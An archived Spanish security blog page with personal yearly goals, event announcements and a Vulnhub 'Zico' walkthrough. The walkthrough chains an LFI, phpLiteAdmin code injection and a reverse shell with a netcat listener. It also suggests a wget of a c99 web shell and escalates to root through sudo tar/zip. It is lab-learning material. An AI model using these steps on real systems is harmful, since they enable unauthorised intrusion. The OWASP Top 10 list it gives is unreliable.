Este nuevo año comienza ya en un par de horas y estas ultimas 2 entradas del blog vinieron mas para cerrar e iniciar por si deseas leer lo que me dejo el 2017.



Las metas de este año que se va y se marcho! las tenemos  en la siguiente entrada por si quieres leerla en el caso de que no a continuación comenzamos con lo que no se pudo de este año

Análisis de las Metas del 2017

  • Rendi unicamente una certificación la eJPT el OSCP otro año mas que lo vamos arrastrando este 2018 o 2019 pero lo realizamos porque sí.
  • No se realizaron las 365 entradas del año, ya que fue justo u necesario dejar un poco el blog para enfocarme más a mi persona en el área informática y el poco tiempo que disponia a disfrutar de la familia.
  • Aprendi un poco sobre Reversing y Exploiting a pesar de que aun falta.
  • Papers de VulnHUB, los realice fue irregular pero se hizo.
  • Los Retos de Snifer@L4b's. no fue posible realizar, :| como lo tenia pensado y estipulado mi mala organización.
  • GPT murío completamente ya que nació #Bashert.
  • El podcast estuvo presente no tan seguido pero lo tenemos.
  • Las entradas movibles en Aeropuerto,hoteles y demás o incluso grabar podcast en otros lugares se realizo ;).
  • Las fotos bajo CC no se realizo en su totalidad.
  • GTD ingreso mas fuerte en mi día a día principalmente casa y laburo.
  • La lectura de los 50 libros no se dio fuerón como 25 libros entre técnicos.
  • La meta de la empresa la dejamos un poco mas allá que se necesita aun una base solida.
Por otra parte para este 2018 que empieza en 24 horas para este lado del charco, sere mas juicioso y ver las cosas como deben ser en lo alcanzable.

Metas para el 2018

  • Rendir dos certs la ECPPT que ya la tengo ahi a punto de salir y una segunda viendo cual puede ser recomendaciones?. El OSCP quizás pero tengo que ver tiempo y esfuerzo a dedicar además de $$$.
  • Escribir en el blog al menos 3 veces por semana como minimo aparte del podcast que vendra en el blog
  • Aprender aun  con mas fuerza Reversing y Exploiting que es justo y necesario.
  • Seguir con la elaboración de las guias de VulnHUB, además de incrementar el de realizar videos de como se resuelve con una parte de edición pero considerando el tiempo que me tomo y no que sea click aquí allá y listo.
  • Al menos realizar un reto para el segmento de Retos de Snifer@L4b's.
  • Seguir con el Podcast y darle un impulso mayor.
  • GTD aun no  se ira de mi vida, mas bien a retomar con más fuerza.
  • Seguir con la lectura de libros técnicos y no técnicos ahora ando con Crónica del Asesino de Reyes - La Trilogía de Kvothe - Patrick Rothfuss
  • Participar al menos en 3 conferencias internacionales o nacioanles como Speaker. 
  • Continuar con el desarrollo de #Bashert, en una próxima entrada ire comentando lo que es y que objetivo tiene.
  • Mejorar mi salud que es momento de hacerlo esto es a mediano corto plazo.
  • Encontrar la estabilidad entre mi hobby, trabajo y la familia sin dejar de lado lo mas importante que tengo en mi día a día la familia.


Estas son mis metas, tanto personales como de proyectos para el blog evidentemente fueron 2 entradas, sin relación a informática pero era necesario expresarlo en la bitácora por cierto estas de acuerdo con las metas del blog? te gustaría algun tema a ser tratado no dudes en decirlo por la caja de comentarios, el buzón de contacto o en su defecto por Telegram, Twitter, me encuentras como @sniferl4bs.


La rabia puede calentarte por la noche, y el orgullo herido puede alentar a un hombre a hacer cosas maravillosas.” #Kvothe.

Regards,
Snifer
Leer Mas

Este año me sorprendio y de una grata manera, en esta entrada comentare todo lo aprendido en este año.


Primero, y como siempre este año tuvimos un total de 95 entradas mas que el 2011 :D, jajaja la razón de este bajo se dió por el cambio de trabajo que tuve a mediados de año lo cual me llevo a bajar la consecuencia de las entradas.


No diré que este fue un año flojo, ya que creció la comunidad que es Snifer@L4b's un claro ejemplo de ello eswl grupo en Telegram HackYSec que llegamos a mas de 600, un espacio donde compartimos y comentamos temas que nos agrada y gusta del área de Seguridad Informática, se crearón algunos Hangout donde llegamos a resolver un par de máquina de Vulnhub, como tambien vimos un poco de los laboratorios de Elearn especificamente la parte de reconocimiento identificación de puertos y servicios, tuve la oportunidad de compartir y conocerlos más.

A medio año que llego a ser el mes de Junio tuvo un cambio en mi rutina de los ultimos años, el cambio fue migrar de barco, salir de mi zona de confort ese cubo, redondo, caja, cuadrado o trinagulo donde me sentia seguro, honestamente me toco pensar mas de 10 veces el animarme a dar el brinco mucho tuvo que ver mi esposa @Rizel, para que tomara la decisión, me fui a Dreamlab un espacio de trabajo que me ayudo a crecer aun más en este medio año.

2017 es el año que caí y creí que no podia levantarme, pero estaba completamente equivocado ya que descubri y aprendí a valorarme más en lo mejor que se hacer y donde me siento que no se nada y es en el Hacking, un año que tuve la oportunidad de conocer otro pais fue mi primera vez fuera de mi tierra Bolivia y fue para ir a Chile estuve 2 semanas específicamente Santiago de Chile, donde reaccione y abrí los ojos.

Este año fue donde rompí la maldición! especificamente en el 8.8 Bolivia, maldición por que desde hace años que no estuve presente en un evento como Speaker o bien en la organización ya que forme parte de ella y "gracias" a uno de los ponentes que estuvo mal me anime a realizar una charla de 30 minutos el cual fue bautizado como CTF 101, la adrenalina de estar al frente y hablar al público volvio una experiencia única.


Así tambien tuve la oportunidad de desvirtualizar a Paulino Calderón, que al fín tuve su firma en el libro de Nmap que me gane cuando me encontraba como desarollador en Cochabamba, por cierto la entrada donde hablo del evento es "Experiencia y Cuestiones 8.8 Bolivia Lucky"


Para terminar el año estuve en el Owasp Day La Paz, donde por razones de fuerza mayor no llegue a estar en todas las charlas mas que en un par contando las del primer día, en este evento presente El pensamiento de Macgyber en el pentesting donde la meta de la charla era el de dar a conocer la necesidad de implementar, automatizar tareas rutinarias de pentesting y lo mas importante comprender las herramientas que usamos en el día a día dejar de presionar el botón gordo y saber por que estamos ejecutando.

Con un pequeño ejemplo de crear, presente algo o diria nada de #Bashert en código pero si lo que me motivo para iniciar el proyecto, que es el renacimiento de GPT la herramienta que el año pasado la tenia en mente, por cierto...








Gracias a todos los que leen el blog, andan viendo en facebook Twitter o en Telegram, gracias por todo este año que paso, los buenos y malos momentos que pasarón o sucedierón a cada uno de los escritorios del blog que comparten sus conocimientos, Gabo, Gabriela, Eric y los que andan offline.

Gracias Lizbeth por ser mi amiga, compañera de vida mi locura y mi calma, sin ti este viaje no pudo ser posible...


"De eso se trata, de coincidir con gente que te haga ver las cosas que tú no ves. Que te enseñe a mirar con otrso ojos" - Mario Benedetti.

Regards,
Snifer
Leer Mas
A pesar que el blog anda off y on este año a todos los que visitan de parte de su servidor una Feliz Navidad, considerando que en el otro lado del charco ya es Navidad, y por este lado estamos a un par de horas.



Pasenla bien con la familia y los seres queridos!

Gracias Andres por mantener vivo el blog ;).


Regards,
Snifer

Leer Mas
Quizás este título no sea el adecuado, alguno llegue o digan que es para tomar mas visitas puede ser?, lo que vengo a compartir con todos ustedes es un proyecto creado por Roadd el cual consiste en la elaboración de un curso para inicializar en el mundo de la seguridad informática. 


Recuerdo que hace un par de años atras vi este curso en Udemy, y si la memoria no me falla en T! si Taringa, de ahí salto a estar totalmente disponible en su propia Web la cual es http://www.hackingdesdecero.org, este material, curso o escuela que llega a considerarse viene para todo aquel que inicia en este mundo y quiere tener una guia ya de aquí tomando como base puede ir surcando más allá un breve contenido de lo inicial y lo que se toma en cuenta en el mismo.


Clase 01 - Introducción al hacking y conceptos de malware
Clase 02 - Nociones básicas de sistemas operativos
Clase 03 - Redes desde cero
Clase 04 - Empezando con encriptación cifrado y  seguridad de la información 
Clase - Programación en C
Creación de Malware
Esteganografía
 y más...

El material me recuerda al viejo HackxCrack que se tuvo  como referencia años atras, y sacarón nuevas versiones, o bien los antiguos Ezines :D, viejos tiempo si ya ando viejo por pasar de digito.

https://hackxcrack.net/foro/cuadernos_antiguos/img/2.png

A continuación se tiene lo que significa para  los creadores del material HDC Hacking desde 0, basta con leer para comprender lo que les anima a compartir lo que van aprendiendo y mejorando  cada vez un poco más, cabe resaltar que hay mejoras en el contenido para hacer pero que mejor que la comunidad retroalimente.  

Roadd Dog: HDC es un monton de cosas. En parte es un portal donde puedo dar mi granito de arena para cambiar el mundo de las personas que estan dispuestas a aprender. Tambien es una segunda casa donde hay gente como vos, referentes, amigos, y lo mejor es que la familia trabaja en equipo. Y por ultimo, es mi pequeño lienzo donde puedo juntar a muchos de mis conocimientos y ponerlos a jugar, porque la gente que lee HDC podra aprender, pero quien escribe aprende mucho mas.

Rolo:Al principio era una herramienta que me ayudaba a progresar, ya que yo empece leyendo los post de Roadd y ahora una forma de devolver lo que internet me ha dado ayudando a personas que recién empiezan. Además le tengo un cariño por que en su momento fue un apoyo y me ha ayudado a conocer a bastante gente.


Tbon3:una comunidad con el fin de orientar a los nuevos o no tan nuevos en el área del hacking
Y educar a las personas que no conocen nada del hacking para que así aprendan a protegerse ya sea de formal personal o profesional


A continuación les dejo el enlace de la web como tambien el grupo en Telegram.


“La felicidad solo es real cuando se comparte.”  Emile Hirsch - Christopher Mccandless

Regards,
Snifer
Leer Mas
Hola a todos, en el día de hoy les voy a mostrar un poco de cómo preparar un entorno para realizar un vulnerability assessment sobre una aplicación Android Watch, el mismo es la manera como tengo configurado para realizar este proceso por lo tanto puede existir otra manera de realizarlo.

 

Para esta tarea necesitaremos las siguientes herramientas:

  • Genymotion + VirtualBox 
  • Android Studio 
  • DK tools 

Iniciamos con la instalación del Virtual Device en genymotion, utilicen el que sea de su preferencia, la interfaz de genymotion es muy intuitiva, simplemente con las opciones Add -> Seleccionar el virtual device a instalar -> Next ya tendremos nuestro android.

Una vez virtualizado vamos a necesitar instalar las GAPPS pero a no desesperarse, genymotion lo pone muy fácil. Haciendo click en el icono de GAPPS como muestra la imagen y siguiendo las instrucciones tendremos todo instalado en unos segundos.


Una vez tengamos eso instalado vamos a descargar del Play Store la aplicación Android Wear.


Luego de esto pasaremos a configurar el smartwatch desde Android Studio ya que en Genymotion al momento de realizar este tutorial no es posible. Antes de todo debemos descargar el paquete que más nos guste con nuestro SDK manager (Esquina superior derecha de Android Studio)


Aquí se deben descargar Android Wear para luego poder virtualizarla, en particular yo me descargue la versión Nougat como muestra la imagen a continuacióN.

Una vez que los pasos anteriores están realizados con éxito, abrimos el AVD Manager (Esquina superior derecha de Android Studio)


Levantamos el Android wear dándole a play desde el AVD.


Y debería quedar algo parecido a esto

 

Con ambas virtuales ya levantadas ponemos en la terminal.

adb devices

Este comando nos va a devolver la lista de dispositivos emulator-5554 (El watch) y la ip local que maneja la VM de genymotion.


Ahora lo más importante, para conectar ambos dispositivos ponemos el siguiente comando:


adb -s 192.168.X.X:PUERTO forward tcp:5601 tcp:5601

A mí me quedaría lo siguiente:


NOTA: Se debe utilizar el puerto TCP:5601 para el forward 

Abrimos el android wear desde el dispositivo móvil y voilá:



Conexión establecida!

Solo queda descargar la app a testear y proxear el celular! pueden ver en esta entrada de Snifer como Configurar Genymotion con Burp Suite.

Happy hacking! 

@gabdotsh
Leer Mas
Esta entrada andaba dormida en el blog ya un año aproximadamente o quizás más fue cuando tuve la idea de realizar los informes de pentesting en LaTeX por cuestiones del destino, nunca pude implementar mas allá de una idea, y como andaba leyendo un poco @Krakakanok pregunto sobre reportes en LaTeX a lo cual recorde esta entrada y por ello la comparto, ya que se puede realizar informes de manera simple y rápida aun mas con los datos incluyendose directamente como anexos por ejemplo un escaneo de nmap, nikto y demás.


En el repositorio de Github se tiene todo lo necesario para formar un propio formato, ya que la base esta realizada para trabajar, recuerdo que lei algo sobre Pandoc para la generación de los documento de manera rápida ire viendo de sacarme tiempo para tenerlo en cuenta, ademas que ahora lo veo mas claro porque no realizar el informe de Elearn Security en LaTeX para presentar me tomaria mas tiempo la elaboración del mismo  no lo se ire viendo y comentando los avances.

Cuando son repositorios de importancia, o que me puedan servir en un futuro próximo trato de compartirlo en el blog, si conocen alguno que igual este realizado con LaTeX por favor compartan, que desde la elaboración de la tesis me enganche con ello. 

Si el presente trata de juzgar el pasado, perderá el futuro - Winston Churchill.

Regards,
Snifer

Leer Mas
Nuevamente con un nuevo reto de Vulnhub, despues de mucho tiempo sin estar rompiendo estos entornos en modo de práctica...



Los datos que nos brinda en la máquina virtual es el siguiente:

Description:
Zico is trying to build his website but is having some trouble in choosing what CMS to use. After some tries on a few popular ones, he decided to build his own. Was that a good idea?
Hint: Enumerate, enumerate, and enumerate!
Thanks to: VulnHub
Author: Rafael (@rafasantos5)

Doesn't work with VMware. Virtualbox only.


Lo primero que realizamos es identificar los equipos vivos con NMAP


Ya identificando el objetivo realizamos un barrido de puertos, con el fin de identificar las versiones exactas de los servicios que cuenta, y de esta manera proceder con nuestro objetivo, en este caso se identificaron dos puertos el 80 y 22 pertenecientes a HTTP y SSH

Lo primero que corresponde en este caso es acceder al servicio web y ver que tenemos corriendo


Desde hace un par de años aproximadamente considero como mi herramienta principal en aplicaciones WEB a Burp Suite, una de las primeras tareas es la ejecucion del crawler para realizar el reconocimiento y descubrimiento de directorios. Identificando el siguiente parámetro /view.php?page= se veia un buen LFI Local File Inclusion, debido a que tiene como referencia a un fichero html que es tools.html.


El siguiente paso que realize como PoC es acceder al index.html quedando de la siguiente manera /view.php?page=index.html viendo que era existoso se llego a obtener el fichero passwd, como tenemos a continuación.


OJO PIOJO: En esta etapa tambien es posible utilizar Fuzzing - JHADDIX_LFI.txt para realizar un fuzzing directamente y ver si obtenemos algun dato importante.


El siguiente paso es tratar de identificar algun fichero que nos sirva para obtener información sensible como ser un config.php, db-config.php e incluso algun backup que ande suelte en la web, para eso procedemos a ejecutar un reconocimiento de directorios, y como era de esperar utilizare el intruder de Burp Suite, con el diccionario de dirb common.txt como se muestra a continuación. 

Configuración en el request

ATENCIÓN: Considera que es posible realizar este mismo proceso con Discover Content de BurpSuite o bien con DIRB, Dirbuster para identificar directorios, y el uso del INTRUDER es únicamente mi punto de vista y mi manera de trabajar con BurpSuite,



Si vemos el resultado lo que llama la atención son los 200 y 301 y en especial el dbadmin, una vez ingresando por el navegador tenemos un test_db.php.




Al acceder tenemos el login de PHPLiteAdmin, y un formulario de Login que únicamente nos pide un usuario en este punto lo que se realizo fue de manera automática ingresar admin ya que es lo primero que siempre intento y vaya sorpresa que el resultado fue exitoso.



TIP - Sugerencia: Lo que debes de tener en cuenta cuando en un entorno real, es buscar en internet contraseñas por defecto muchas veces no se cambia o se deja como viene de fábrica.


El siguiente paso es identificar si esta versión de PHPLiteAdmin cuenta con alguna vulnerabilidad como vimos anteriormente en el blog, usamos SearchSploit para ver si se tiene alguna vulnerabilidad y vaya sorpresa evidentemente la versión actual es vulnerable.



Si vemos la especificación del mismo nos indica que nos permite crear una base de datos y con ella al crear una tabla con datos adicionales llegamos a realizar una inyección de Código.

Primero para verificar unicamente llamos un phpinfo() y vemos que si es posible explotar.



Si vemos a continuación daremos uso al LFI identificado con anterioridad, al momento de crear la base de datos tenemos el directorio, /usr/databases/ al acceder tenemos la información respectiva de PHP.



El siguiente paso es realizar un reverse Shell con PHP, como vemos en la siguiente captura se tiene el código


En este caso usare netcat para estar a la escucha con el comando:

nc -lvp 443


PIENSA DIFERENTE: Esta manera de explotar que realize con PHP y ejecutar una shell reversa, puede tener diferentes variantes como ser la descarga de una Shell desde un Servidor system("wget -c http://c99.php") o bien crear una con Metasploit, weevely e incluso llamando a un NETCAT, el límite a esto lo pone tu imaginación.

En los comentarios que nos brinda, la máquina nos dice claramente que la clave esta en el reconocimiento por lo tanto me dispuse a navegar con la terminal entre los diferentes directorios del servidor, hasta que llegue a home/zico al ingresar veo que existe un to_do.txt.


Tras navegar entre los directorios de wordpress y Joomla se identifico en el wordpress el fichero de configuración. wp-config.php.


El resultado del mismo es el siguiente, donde tenemos un usuario y contraseña en este punto para que nos puede servir?, recuerdan el SSH porque no intentar y ver si llegamos a acceder, el resultado del mismo es exitoso, pero como vemos a continuación aun no tenemos root en el servidor, para ello ejecutamos sudo -l y verificamos si esta debidamente configurado el SUDO.


Se ve que tenemos como root dos opciones para ejecutar tar y zip y no pide la contraseña, asi que tras revisar un poco identifique el siguiente gist en el cual se explica como obtener una shell con tar y zip respectivamente.


Una ves logrado se tiene acceso de root y por lo tanto accedemos a la flag.txt, tenemos también la opción de hacer un reconocimiento de la versión del Kernel por ejemplo y proceder a escalar privilegios https://www.exploit-db.com/exploits/26131/

Recién estos dias aprendí a llegar a obtener shells por medio de las BAD sudo config gracias a Monr4 por la explicación que tuvo, esta es la primera vez que llego a escalar privilegios de esta manera, algo que tenia como pendiente aprenderlo y ahora ya creo que voy afianzando mis conocimientos aun mas. Durante el proceso de la elaboración de la máquina virtual bueno resolución, el tiempo que me tomo en resolver la máquina fue de 1:30 minutos ya que andaba varado en este punto de escalar privilegios.

"Toda lectura debe ir acompañada de meditación, es la única manera de encontrar en los libros lo que otros no supieron hallar en ellos" Levay


Regards,
Snifer
Leer Mas
Se viene en un par de semanas el OWASP DAY LA PAZ, como comente anteriormente andare retornando y compartiendo con la comunidad nuevamente como lo hacia hace un par de años atras, y por ello espero estar presente el 8 y 9 de Diciembre en el Owasp Day a realizarse en la ciudad de La Paz en la UMSS. Pero por ahora se tiene unicamente el CFP Call for Papers , y en el idioma de Cervantes conocido como LLamado a los speakers!! (No hagas caso a mi ingles loco).

A continuación comparto el enlace respectivo para el que se anime a mandar una charla donde puede estar compartiendo por 25 o 45 minutos, por mi parte estare presente el día 9  Sábado, espero encontrarme con alguno y desvirtualizarlo vere de tener stickers de SniferL4bs o el Dino para ese día, recordarles que  el mes de Octubre se tuvo el OWASP Day en Cochabamba, además de contar en Abril con el OWASP LATAM Tour. 

La charla que actualmente esta confirmada es Ricardo Berrospi desde Perú.

https://pbs.twimg.com/media/DOTvFrqWsAAz4XP.jpg

La charla que mande como propuesta es #Bashert el desarrollo de mi herramienta que tiene como objetivo automatizar las tareas de pentesting que realizo en el dia a dia.


"La vida no es esperar a que pase la tormenta, sino salir a bailar bajo la lluvia" Daisaku Ikeda.


Regards,
Snifer
Leer Mas
El pasado mes de Octubre se tuvo en La Paz Bolivia el evento 8.8 Lucky en el cual tuve el placer de formar parte de la organización, va desde el 2012 aproximadamente que no andaba detrás de organizar un evento de seguridad informática ya que me agrada meterme en el mambo a pesar de ser un peso extra pero la satisfacción de que se realize es bastante.


Tuve la oportunidad de conocer a grandes ponentes compartir un momento en el break, o almuerzo lo cual me llevo a querer superarme aun más, e impulsar un poco el blog y todos los proyectos que se tienen, como nota anecdotaria del evento es que al fin despues de 4 años, como se tiene en la siguiente entrada Al fin llego el libro de NMAP, llego a firmar el libro, teniendo el placer de desvirtualizar a @calderpwn, ademas de regalarme un protector para la laptop de WebSec que anda ya acompañandome con la laptop de la oficina.


Las charlas que se tuvieron fueron las siguientes, dar las gracias a todos los speakers que tuve el gusto de conocerlos y disfrutar un poco los dos días.


El segundo día del evento, se tuvo una baja médica de uno de los speakers por lo cual se me ocurrio temprano poder dar una charla corta, con la intención para no hacer esperar a los asistentes tanto tiempo, comente con la organización  y mi sorpresa fue grata, ya que me dieron luz verder para hacerlo, la misma fue como afrontar un CTF dar a conocer en que consiste los tipos que existe y cual es su objetivo de ellos además de explicar un poco sobre los retos que se dieron en Facebook y Twitter para ganarse una entrada para estar en el evento.


Si era yo, el que realizo los retos, así que si desean...




Les dejo en el siguiente enlace la presentación por si alguno de los que lee el blog estuvo presente en el evento fue la presentación mas rápida que arme y además de entretenida, desde aqui dar las gracias a la organización de la 8.8 Bolivia por permitirme formar parte del evento y apoyar, al año estaremos presentes dando una charla, que por cierto en estos días iremos moviendo mas el ambiente. 



"Hay una fuerza motriz más poderosa que el vapor, la electricidad y la energía atómica…La voluntad." Albert Einstein


Regards,
Snifer
Leer Mas
Hace 7 años que inicio este viaje, de crear un blog totalmente personal y tenerlo como referencia, un pequeño espacio al cual podría consultar cada X tiempo, lo que llegue a escribir...


Al comienzo de todo, lo tenía como un diario de las cosillas que vaya aprendiendo en la Universidad y esos pasos que daba en el mundo de la seguridad informática, en realidad lo que molestaba y usaba como conejillo de Indias a los compañeros de la U especificamente cuando me mude a Cochabamba,de a poco fui animándome a realizar entradas de Informática o Linux.


El título es 6 años y en el contenido menciono 7 años, quizas no todos saben pero el primer año que estuvo online el blog fue dado de baja sin previo aviso y como se dice "En casa de Herrero, cuchillo de palo" no tenía un Backup, a partir de ese incidente  cada semana llego a sacar el backup del Blog.

http://2.bp.blogspot.com/-O_-higkMNAo/TojIbOiyC4I/AAAAAAAAAAQ/QXZnNAuPISQ/s320/Pantallazo.png

El aniversario fue hace un mes, exactamente en Octubre, por cuestiones temporales del multiverso, pasó el tiempo sin darme cuenta, y hoy quiero darles las gracias a todos por dejar y permitir que Jose Moruno aka Snifer pueda compartir sus experiencias en el mundo que lo apasiona. En todo este tiempo del blog, noto y note un cambio completo y total por la forma de escribir que viendo entradas de ante año y ahora mejore bastante, considerando que aún hay cosas que mejorar pero vamos por buen camino, las entradas cambiaron bastante en este tiempo al inicio era entradas de Linux y algo desarrollo pasando cuando tenia tiempo a escribir algo de hacking. 

Ver atras en el tiempo y ver al muchacho que andaba en la Universidad soñando con trabajar en Seguridad Informática, dedicarse cada dia a ello, solo le digo que si es posible soñar, todo esfuerzo vale la pena, cada caida tropiezo solo sirve para hacer que uno sea mas fuerte.


Este año no compartire el status de entradas, visitas y demás lo veo innecesario... Lo que si les quiero compartir son los próximos proyectos en el Blog y los que seguiremos creando, a pesar de todo esta inactividad que tuvimos que sirvieron para afianzar y mejorar en esto que a todos nos apasiona la Seguridad Informática.

Como siempre trato de mantener el Canal en Youtube que el año pasado iniciamos lo que es Dame una Shell en formato Podcast el mismo desde el mes de Octubre que deje de grabar mas que todo por no sacar el tiempo necesario para crear material y contenido, pero bueno contenido si hay, lo que falta es el impulso de sentarme y ponerme a grabar los mismos, respecto a los Hangout que espero retomarlos pronto y ver como realizarlo de una manera mas amena posible.

El podcast lo subimos a Ivoox en el cual lo tienen al lado derecho, para que se suscriban o lo tengan agregado a sus feeds, ahi vamos subiendo tanto los Hangouts como los Podcast.



Cualquier mejora que puedan mencionar ante ambos proyectos no duden en hacerlo que es para una mejora continua e ir creciendo.

Tambien comentarles que se retomara en el grupo de Telegram HackySec que pertence al proyecto de SniferL4bs, la realización de solucionarios de Máquinas de Vulnhub en el siguiente enlace podrán tener el desglose del proyecto por decirlo así y lo que se desea realizar.

Respecto a videos a realizar anda en mente, tener algunos Paso a Paso de como resolver las máquinas virtuales, a pesar de que se tenga el mismo en una entrada especificando todo el proceso que se tuvo veremos como avanza esta idea y si llega a madura, espero si tienen alguna idea referente a que temas a tratar lo digan en los comentarios o bien por Twitter, Telegram.



En fin gracias por leerme y nos vemos mañana con una nueva entrada en el blog.

Related image

"Con orden y tiempo se encuentra el secreto de hacerlo todo, y de hacerlo bien." Pitágoras

Regards,
Snifer
Leer Mas
En el podcast comento sobre monero la criptomoneda que anda en auge, usada para algunos ataques informáticos como tambien la historia del origen de las criptomonedas, además de ello los nuevos ataques que se estan realizando o futuros ataques para minar Monero, y yendo mas allá el cambio de los ads por Mina un poco con tu CPU-GPU, ya que con PirateBay y ShowTime nos da a conocer que pueden existir más páginas que minen por visitas, para saber un poco más de lo hablado les invito a que escuchen el podcast.


Si estan interesados en mas información suscribanse, y como lo dije en el Podcast si desean armamos uno dedicado a Bitcoin e historia.

Escuchalo en Youtube


Escuchalo por Ivoox



Abandonar puede tener justificación; abandonarse no la tiene jamás. - Ralph W. Emerson

Regards,
Snifer
Leer Mas
Como saben este año se tuvo un cambio en el TOP 10 de OWASP, en el cual si uno se pone a buscar una versión en español es complicado tenerla, bueno era dificil si no comprende Ingles y desea tenerlo en el idioma de Cervantes , no se tiene pero en Underc0de realizarón la traducción.

OWASP Top-10 2017 en Español.

Que cambios se tiene en el TOP 10 Owasp al anterior? por si alguien se pregunta se tiene dos nuevos vectores que son:

A07- Protección Insuficiente contra Ataques
A10- APIs bajo Protecciones.

Cambios importantes o trascendentales no se tuvierón, pero no esta demás tenerlo disponible y aun mas si eres una persona que esta comenzando tenerlo como referencia.


No puedo volver al ayer, porque ya soy una persona diferente. - Lewis Carroll

PD: Si ha vuelto ! SniferL4bs!!!!

Regards,
Snifer
Leer Mas